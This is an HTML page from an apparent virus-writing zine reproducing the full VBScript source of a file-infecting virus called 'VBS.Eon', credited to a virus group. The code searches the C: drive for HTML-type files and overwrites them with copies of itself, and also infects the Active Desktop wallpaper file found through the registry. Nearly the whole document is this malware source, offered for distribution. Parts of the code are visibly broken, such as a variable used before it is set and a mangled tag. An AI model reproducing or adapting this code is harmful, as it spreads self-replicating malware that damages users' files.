<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>VBS.Eon</Title>
</HEAD>
<BODY bgcolor = white text = black link = darkgray vlink = lightgray alink = red>
<h3>VBS.Eon (uncommented) - <i>By Ruzz`</i></h3>
<font size = 1>This code was released in linezer0 network zine #2.</font><br>
<font size = "2" face = courier>
' VBS.Eon<br>
' Coded by Ruzz`<br>
' The Shadow Virus Group<br>
' http://www.shadowvx.org/<br>
'<br>
' Begin code<br>
On Error Resume Next
<br><br>
Set fso = CreateObject("Scripting.FileSystemObject")<br>
Set wordobj = CreateObject("Word.application")<br>
Set reg = CreateObject("WScript.Shell")<br>
parent = Wscript.ScriptFullName<br>
Set srch = wordobj.Application.FileSearch
<br><br>
Const ForReading = 1, ForWriting = 2, ForAppending = 8<br>
Const TristateUseDefault = -2, TristateTrue = -1, TristateFalse = 0
<br><br>
srch.NewSearch<br>
srch.LookIn = "c:\"<br>
srch.SearchSubFolders = True<br>
srch.FileName = "*.ht*"<br>
srch.Execute
<br><br>
Set openme = fso.opentextfile(parent, 1)<br>
openmeread = openme.readall<br>
openme.close
<br><br>
For count  = 1 To srch.FoundFiles.Count<br>
&nbsp;&nbsp;Set opencount = fso.opentextfile(srch.FoundFiles(count),2)<br>
&nbsp;&nbsp;Set openhtt = fso.opentextfile(RegActive,1)<br>
&nbsp;&nbsp;read1stline = openhtt.readline<br>
&nbsp;&nbsp;If read1stline = "&lt;!-- Phybre --&gt;" Then<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhtt.close<br>
&nbsp;&nbsp;Else<br>
&nbsp;&nbsp;&nbsp;&nbsp;oldhtt = openhtt.readall<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhtt.close<br>
&nbsp;&nbsp;&nbsp;&nbsp;set openhttr = fso.opentextfile(srch.FoundFiles(count),2)<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhttr.write "&lt;!-- Phybre --&gt;" & vbcrlf<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhttr.write "&lt;Script language = VBScript7gt;" & vbcrlf<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhttr.write (openmeread) & vbcrlf<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhttr.write "&lt;" & Chr(47) & "Script&gt;"<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhttr.write (openmeread)<br>
&nbsp;&nbsp;&nbsp;&nbsp;openhttr.close<br>
&nbsp;&nbsp;End If<br>
Next
<br><br>
WORDOBJ.Quit
<br><br>
RegActive = reg.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General\Wallpaper")<br><br>

If RegActive &lt;&gt; "" Then<br>
&nbsp;&nbsp;Set openad = fso.opentextfile(RegActive,1)<br>
&nbsp;&nbsp;read1stline = openad.readline<br>
&nbsp;&nbsp;If read1stline = "&lt;!-- Phybre --&gt;" Then<br>
&nbsp;&nbsp;&nbsp;&nbsp;openad.close<br>
&nbsp;&nbsp;Else<br>
&nbsp;&nbsp;&nbsp;&nbsp;oldread = openad.readall<br>
&nbsp;&nbsp;&nbsp;&nbsp;openad.close<br>
&nbsp;&nbsp;&nbsp;&nbsp;set opened = fso.opentextfile(RegActive,2)<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.write "&lt;!-- Phybre --&gt;" & vbcrlf & "<HTML>" & vbcrlf<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.write "&lt;Script language = VBScript&gt;" & vbcrlf<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.write (openmeread) & vbcrlf<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.write "&lt;" & Chr(47) & "Script&gt;"<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.writeblanklines (1)<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.write oldread<br>
&nbsp;&nbsp;&nbsp;&nbsp;opened.close<br>
&nbsp;&nbsp;End If<br>
End If<br>
<br>
'End Code
</font>
</BODY>
</HTML>
